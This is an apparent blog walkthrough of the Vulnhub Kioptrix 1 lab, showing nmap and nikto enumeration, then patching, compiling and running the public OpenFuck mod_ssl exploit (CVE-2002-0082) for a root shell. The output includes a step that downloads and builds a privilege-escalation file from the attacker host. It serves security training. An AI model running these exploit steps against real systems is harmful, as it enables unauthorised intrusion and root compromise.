Thursday, April 6, 2017

Kioptrix 1 - Vulnhub Walkthrough - ssl_mod

Introduction

This is the second walk through I’m doing in the series. I’m tackling VM’s that are told to be similar to what’s on the OSCP PWK. Since I’ll be tackling the OSCP again in the future I figure this will be good practice in the meantime.

Kioptrix is a series itself with I believe 5 vulnerable VM’s geared towards beginners and since that’s still what I consider myself I’m going to tackle this whole series.

I had some trouble early on with the initial porting from VMWare vmdk to VirtualBox since that’s what I’m currently using. Porting it over isn’t hard just have to remember from the last time I did it. A quick google turned up the easy information I had forgotten. Also to note my version of VirtualBox defaulted to SSD for the hard drive but Kioptrix wasn’t having that giving me a kernel panic. Changing that to IDE hard drive fixed it. Next issue was getting dhcp to issue a ip address. I have pfsense running for internal network to keep my environment safe and not let anything in or out other than the host OS. For whatever reason Kioptrix didn’t like the intel pro100/1000 virtual chipset so I had to change that PCNet PCI II for it to get dhcp. I assume that has something to do with my version of VirtualBox and how old the kernel on the VM is. Either way I got it working.

Enumeration

As always I start enumerating the ports to see what’s open gathering the headers and versions and OS information. ENUMERATE ALL THE THINGS!

root@kali:~# nmap -sV -Pn -p1-65535 -A 172.16.2.13 --open 

Starting Nmap 7.40 ( https://nmap.org ) at 2017-04-02 13:57 CDT
Nmap scan report for 172.16.2.13
Host is up (0.00033s latency).
Not shown: 65529 closed ports
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT      STATE SERVICE     VERSION
22/tcp    open  ssh         OpenSSH 2.9p2 (protocol 1.99)
| ssh-hostkey: 
|   1024 b8:74:6c:db:fd:8b:e6:66:e9:2a:2b:df:5e:6f:64:86 (RSA1)
|   1024 8f:8e:5b:81:ed:21:ab:c1:80:e1:57:a3:3c:85:c4:71 (DSA)
|_  1024 ed:4e:a9:4a:06:14:ff:15:14:ce:da:3a:80:db:e2:81 (RSA)
|_sshv1: Server supports SSHv1
80/tcp    open  http        Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
111/tcp   open  rpcbind     2 (RPC #100000)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2            111/tcp  rpcbind
|   100000  2            111/udp  rpcbind
|   100024  1          32768/tcp  status
|_  100024  1          32770/udp  status
139/tcp   open  netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp   open  ssl/https   Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-server-header: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: 400 Bad Request
|_ssl-date: 2017-04-02T19:56:59+00:00; +59m19s from scanner time.
| sslv2: 
|   SSLv2 supported
|   ciphers: 
|     SSL2_RC4_64_WITH_MD5
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|     SSL2_RC2_128_CBC_WITH_MD5
|     SSL2_DES_64_CBC_WITH_MD5
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|_    SSL2_RC4_128_WITH_MD5
32768/tcp open  status      1 (RPC #100024)
MAC Address: 08:00:27:AF:56:C9 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 2.4.X
OS CPE: cpe:/o:linux:linux_kernel:2.4
OS details: Linux 2.4.9 - 2.4.18 (likely embedded)
Network Distance: 1 hop

Host script results:
|_clock-skew: mean: 59m18s, deviation: 0s, median: 59m18s
|_nbstat: NetBIOS name: KIOPTRIX, NetBIOS user: , NetBIOS MAC:  (unknown)

TRACEROUTE
HOP RTT     ADDRESS
1   0.33 ms 172.16.2.13

So just the open ports and services seem to give a great deal of information. We see both port 80 and 443 open so lets run nikto and see what it comes up with next.

root@kali:~# nikto -host 172.16.2.13
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          172.16.2.13
+ Target Hostname:    172.16.2.13
+ Target Port:        80
+ Start Time:         2017-04-05 21:25:29 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
+ Server leaks inodes via ETags, header found with file /, inode: 34821, size: 2890, mtime: Wed Sep  5 22:12:46 2001
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ OpenSSL/0.9.6b appears to be outdated (current is at least 1.0.1j). OpenSSL 1.0.0o and 0.9.8zc are also current.
+ mod_ssl/2.8.4 appears to be outdated (current is at least 2.8.31) (may depend on server version)
+ Apache/1.3.20 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ OSVDB-27487: Apache is vulnerable to XSS via the Expect header
+ Allowed HTTP Methods: GET, HEAD, OPTIONS, TRACE 
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-838: Apache/1.3.20 - Apache 1.x up 1.2.34 are vulnerable to a remote DoS and possible code execution. CAN-2002-0392.
+ OSVDB-4552: Apache/1.3.20 - Apache 1.3 below 1.3.27 are vulnerable to a local buffer overflow which allows attackers to kill any process on the system. CAN-2002-0839.
+ OSVDB-2733: Apache/1.3.20 - Apache 1.3 below 1.3.29 are vulnerable to overflows in mod_rewrite and mod_cgi. CAN-2003-0542.
+ mod_ssl/2.8.4 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0082, OSVDB-756.
+ ///etc/hosts: The server install allows reading of any system file by adding an extra '/' to the URL.
+ OSVDB-682: /usage/: Webalizer may be installed. Versions lower than 2.01-09 vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-3268: /manual/: Directory indexing found.
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3268: /icons/: Directory indexing found.
+ ERROR: Error limit (20) reached for host, giving up. Last error: error reading HTTP response
+ Scan terminated:  17 error(s) and 19 item(s) reported on remote host
+ End Time:           2017-04-05 21:33:12 (GMT-5) (463 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

I highlighted the part that looked most interesting to me. Seems there's a remote buffer overflow which allows attackers to kill any process on the system with CVE 2002-0082 so lets google around for that.

Looks like we have an exploit from exploit-db! That's very hopeful. Prior to going all out and compiling and attacking read the source first. The source tells you it's outdated and needs to have some updates and shows a url to head to. Remember the CVE is from 2002! So heading over to the url it shows the following updates that need made.

apt-get install libssl-dev

add the following libraries to the source code

#include <openssl/rc4.h>
#include <openssl/md5.h>

Next search in the source code for "wget" without the quotes and replace the url you find with this one

http://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
Next find line 961 and add "const" to the beginning should look like the following
const unsigned char *p, *end;

Finally we need to compile it

gcc -o OpenFuck 764.c -lcrypto

I had done mine slightly different since since my lab doesn't go out to the internet other than my kali box if I change the network configuration. So I downloaded ptrace-kmod.c from packetstormsecurity to my kali box and moved it to /var/www/html and started apache and changed the line with wget to 172.16.2.13/ptrace-kmod.c.

wget http://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
mv ptrace-kmod.c /var/www/html
service apache2 start

Finally let's run the exploit!

root@kali:~# ./openfuck

*******************************************************************
* OpenFuck v3.0.32-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM    with code of Spabam - LSD-pl - SolarEclipse - CORE *
* #hackarena  irc.brasnet.org                                     *
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
*******************************************************************

: Usage: ./openfuck target box [port] [-c N]

  target - supported box eg: 0x00
  box - hostname or IP address
  port - port for ssl connection
  -c open N connections. (use range 40-50 if u dont know)
  

  Supported OffSet:
 0x00 - Caldera OpenLinux (apache-1.3.26)
 0x01 - Cobalt Sun 6.0 (apache-1.3.12)
 0x02 - Cobalt Sun 6.0 (apache-1.3.20)
 0x03 - Cobalt Sun x (apache-1.3.26)
 0x04 - Cobalt Sun x Fixed2 (apache-1.3.26)
 0x05 - Conectiva 4 (apache-1.3.6)
 0x06 - Conectiva 4.1 (apache-1.3.9)
 0x07 - Conectiva 6 (apache-1.3.14)
 0x08 - Conectiva 7 (apache-1.3.12)
 0x09 - Conectiva 7 (apache-1.3.19)
 0x0a - Conectiva 7/8 (apache-1.3.26)
 0x0b - Conectiva 8 (apache-1.3.22)
 0x0c - Debian GNU Linux 2.2 Potato (apache_1.3.9-14.1)
 0x0d - Debian GNU Linux (apache_1.3.19-1)
 0x0e - Debian GNU Linux (apache_1.3.22-2)
 0x0f - Debian GNU Linux (apache-1.3.22-2.1)
 0x10 - Debian GNU Linux (apache-1.3.22-5)
 0x11 - Debian GNU Linux (apache_1.3.23-1)
 0x12 - Debian GNU Linux (apache_1.3.24-2.1)
 0x13 - Debian Linux GNU Linux 2 (apache_1.3.24-2.1)
 0x14 - Debian GNU Linux (apache_1.3.24-3)
 0x15 - Debian GNU Linux (apache-1.3.26-1)
 0x16 - Debian GNU Linux 3.0 Woody (apache-1.3.26-1)
 0x17 - Debian GNU Linux (apache-1.3.27)
 0x18 - FreeBSD (apache-1.3.9)
 0x19 - FreeBSD (apache-1.3.11)
 0x1a - FreeBSD (apache-1.3.12.1.40)
 0x1b - FreeBSD (apache-1.3.12.1.40)
 0x1c - FreeBSD (apache-1.3.12.1.40)
 0x1d - FreeBSD (apache-1.3.12.1.40_1)
 0x1e - FreeBSD (apache-1.3.12)
 0x1f - FreeBSD (apache-1.3.14)
 0x20 - FreeBSD (apache-1.3.14)
 0x21 - FreeBSD (apache-1.3.14)
 0x22 - FreeBSD (apache-1.3.14)
 0x23 - FreeBSD (apache-1.3.14)
 0x24 - FreeBSD (apache-1.3.17_1)
 0x25 - FreeBSD (apache-1.3.19)
 0x26 - FreeBSD (apache-1.3.19_1)
 0x27 - FreeBSD (apache-1.3.20)
 0x28 - FreeBSD (apache-1.3.20)
 0x29 - FreeBSD (apache-1.3.20+2.8.4)
 0x2a - FreeBSD (apache-1.3.20_1)
 0x2b - FreeBSD (apache-1.3.22)
 0x2c - FreeBSD (apache-1.3.22_7)
 0x2d - FreeBSD (apache_fp-1.3.23)
 0x2e - FreeBSD (apache-1.3.24_7)
 0x2f - FreeBSD (apache-1.3.24+2.8.8)
 0x30 - FreeBSD 4.6.2-Release-p6 (apache-1.3.26)
 0x31 - FreeBSD 4.6-Realease (apache-1.3.26)
 0x32 - FreeBSD (apache-1.3.27)
 0x33 - Gentoo Linux (apache-1.3.24-r2)
 0x34 - Linux Generic (apache-1.3.14)
 0x35 - Mandrake Linux X.x (apache-1.3.22-10.1mdk)
 0x36 - Mandrake Linux 7.1 (apache-1.3.14-2)
 0x37 - Mandrake Linux 7.1 (apache-1.3.22-1.4mdk)
 0x38 - Mandrake Linux 7.2 (apache-1.3.14-2mdk)
 0x39 - Mandrake Linux 7.2 (apache-1.3.14) 2
 0x3a - Mandrake Linux 7.2 (apache-1.3.20-5.1mdk)
 0x3b - Mandrake Linux 7.2 (apache-1.3.20-5.2mdk)
 0x3c - Mandrake Linux 7.2 (apache-1.3.22-1.3mdk)
 0x3d - Mandrake Linux 7.2 (apache-1.3.22-10.2mdk)
 0x3e - Mandrake Linux 8.0 (apache-1.3.19-3)
 0x3f - Mandrake Linux 8.1 (apache-1.3.20-3)
 0x40 - Mandrake Linux 8.2 (apache-1.3.23-4)
 0x41 - Mandrake Linux 8.2 #2 (apache-1.3.23-4)
 0x42 - Mandrake Linux 8.2 (apache-1.3.24)
 0x43 - Mandrake Linux 9 (apache-1.3.26)
 0x44 - RedHat Linux ?.? GENERIC (apache-1.3.12-1)
 0x45 - RedHat Linux TEST1 (apache-1.3.12-1)
 0x46 - RedHat Linux TEST2 (apache-1.3.12-1)
 0x47 - RedHat Linux GENERIC (marumbi) (apache-1.2.6-5)
 0x48 - RedHat Linux 4.2 (apache-1.1.3-3)
 0x49 - RedHat Linux 5.0 (apache-1.2.4-4)
 0x4a - RedHat Linux 5.1-Update (apache-1.2.6)
 0x4b - RedHat Linux 5.1 (apache-1.2.6-4)
 0x4c - RedHat Linux 5.2 (apache-1.3.3-1)
 0x4d - RedHat Linux 5.2-Update (apache-1.3.14-2.5.x)
 0x4e - RedHat Linux 6.0 (apache-1.3.6-7)
 0x4f - RedHat Linux 6.0 (apache-1.3.6-7)
 0x50 - RedHat Linux 6.0-Update (apache-1.3.14-2.6.2)
 0x51 - RedHat Linux 6.0 Update (apache-1.3.24)
 0x52 - RedHat Linux 6.1 (apache-1.3.9-4)1
 0x53 - RedHat Linux 6.1 (apache-1.3.9-4)2
 0x54 - RedHat Linux 6.1-Update (apache-1.3.14-2.6.2)
 0x55 - RedHat Linux 6.1-fp2000 (apache-1.3.26)
 0x56 - RedHat Linux 6.2 (apache-1.3.12-2)1
 0x57 - RedHat Linux 6.2 (apache-1.3.12-2)2
 0x58 - RedHat Linux 6.2 mod(apache-1.3.12-2)3
 0x59 - RedHat Linux 6.2 update (apache-1.3.22-5.6)1
 0x5a - RedHat Linux 6.2-Update (apache-1.3.22-5.6)2
 0x5b - Redhat Linux 7.x (apache-1.3.22)
 0x5c - RedHat Linux 7.x (apache-1.3.26-1)
 0x5d - RedHat Linux 7.x (apache-1.3.27)
 0x5e - RedHat Linux 7.0 (apache-1.3.12-25)1
 0x5f - RedHat Linux 7.0 (apache-1.3.12-25)2
 0x60 - RedHat Linux 7.0 (apache-1.3.14-2)
 0x61 - RedHat Linux 7.0-Update (apache-1.3.22-5.7.1)
 0x62 - RedHat Linux 7.0-7.1 update (apache-1.3.22-5.7.1)
 0x63 - RedHat Linux 7.0-Update (apache-1.3.27-1.7.1)
 0x64 - RedHat Linux 7.1 (apache-1.3.19-5)1
 0x65 - RedHat Linux 7.1 (apache-1.3.19-5)2
 0x66 - RedHat Linux 7.1-7.0 update (apache-1.3.22-5.7.1)
 0x67 - RedHat Linux 7.1-Update (1.3.22-5.7.1)
 0x68 - RedHat Linux 7.1 (apache-1.3.22-src)
 0x69 - RedHat Linux 7.1-Update (1.3.27-1.7.1)
 0x6a - RedHat Linux 7.2 (apache-1.3.20-16)1
 0x6b - RedHat Linux 7.2 (apache-1.3.20-16)2
 0x6c - RedHat Linux 7.2-Update (apache-1.3.22-6)
 0x6d - RedHat Linux 7.2 (apache-1.3.24)
 0x6e - RedHat Linux 7.2 (apache-1.3.26)
 0x6f - RedHat Linux 7.2 (apache-1.3.26-snc)
 0x70 - Redhat Linux 7.2 (apache-1.3.26 w/PHP)1
 0x71 - Redhat Linux 7.2 (apache-1.3.26 w/PHP)2
 0x72 - RedHat Linux 7.2-Update (apache-1.3.27-1.7.2)
 0x73 - RedHat Linux 7.3 (apache-1.3.23-11)1
 0x74 - RedHat Linux 7.3 (apache-1.3.23-11)2
 0x75 - RedHat Linux 7.3 (apache-1.3.27)
 0x76 - RedHat Linux 8.0 (apache-1.3.27)
 0x77 - RedHat Linux 8.0-second (apache-1.3.27)
 0x78 - RedHat Linux 8.0 (apache-2.0.40)
 0x79 - Slackware Linux 4.0 (apache-1.3.6)
 0x7a - Slackware Linux 7.0 (apache-1.3.9)
 0x7b - Slackware Linux 7.0 (apache-1.3.26)
 0x7c - Slackware 7.0  (apache-1.3.26)2
 0x7d - Slackware Linux 7.1 (apache-1.3.12)
 0x7e - Slackware Linux 8.0 (apache-1.3.20)
 0x7f - Slackware Linux 8.1 (apache-1.3.24)
 0x80 - Slackware Linux 8.1 (apache-1.3.26)
 0x81 - Slackware Linux 8.1-stable (apache-1.3.26)
 0x82 - Slackware Linux (apache-1.3.27)
 0x83 - SuSE Linux 7.0 (apache-1.3.12)
 0x84 - SuSE Linux 7.1 (apache-1.3.17)
 0x85 - SuSE Linux 7.2 (apache-1.3.19)
 0x86 - SuSE Linux 7.3 (apache-1.3.20)
 0x87 - SuSE Linux 8.0 (apache-1.3.23)
 0x88 - SUSE Linux 8.0 (apache-1.3.23-120)
 0x89 - SuSE Linux 8.0 (apache-1.3.23-137)
 0x8a - Yellow Dog Linux/PPC 2.3 (apache-1.3.22-6.2.3a)
Looks like we need to do a little more. So we know we have RedHat and we know it's apache 1.3.20. So looks like our options are
0x6a or 0x6b

Lets try the first one

root@kali:~# ./openfuck 0x6a 172.16.2.13 443

*******************************************************************
* OpenFuck v3.0.32-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM    with code of Spabam - LSD-pl - SolarEclipse - CORE *
* #hackarena  irc.brasnet.org                                     *
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
*******************************************************************

Establishing SSL connection
cipher: 0x4043808c   ciphers: 0x80ffe70
Ready to send shellcode
Spawning shell...
Good Bye!

Doesn't look like it so lets try the other one

root@kali:~# ./openfuck 0x6b 172.16.2.13 443

*******************************************************************
* OpenFuck v3.0.32-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM    with code of Spabam - LSD-pl - SolarEclipse - CORE *
* #hackarena  irc.brasnet.org                                     *
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
*******************************************************************

Establishing SSL connection
cipher: 0x4043808c   ciphers: 0x80f8050
Ready to send shellcode
Spawning shell...
bash: no job control in this shell
bash-2.05$ 
ace-kmod.c; rm ptrace-kmod.c; ./p;  wget 172.16.2.21/ptrace-kmod.c; gcc -o p ptr 
--15:08:48--  http://172.16.2.21/ptrace-kmod.c
           => `ptrace-kmod.c'
Connecting to 172.16.2.21:80... connected!
HTTP request sent, awaiting response... 200 OK
Length: 4,128 [text/x-csrc]

    0K ....                                                  100% @   3.94 MB/s

15:08:48 (3.94 MB/s) - `ptrace-kmod.c' saved [4128/4128]

/usr/bin/ld: cannot open output file p: Permission denied
collect2: ld returned 1 exit status
pwd
/tmp
whoami
root

We have root! Also it might take a couple times of running OpenFuck before it works but it will work if all is set up correctly. In another post i'll go over troubleshooting for OpenFuck since I had a hard time after doing a dist-upgrade of kali. Hope y'all enjoy these walk throughs.

No comments:

Post a Comment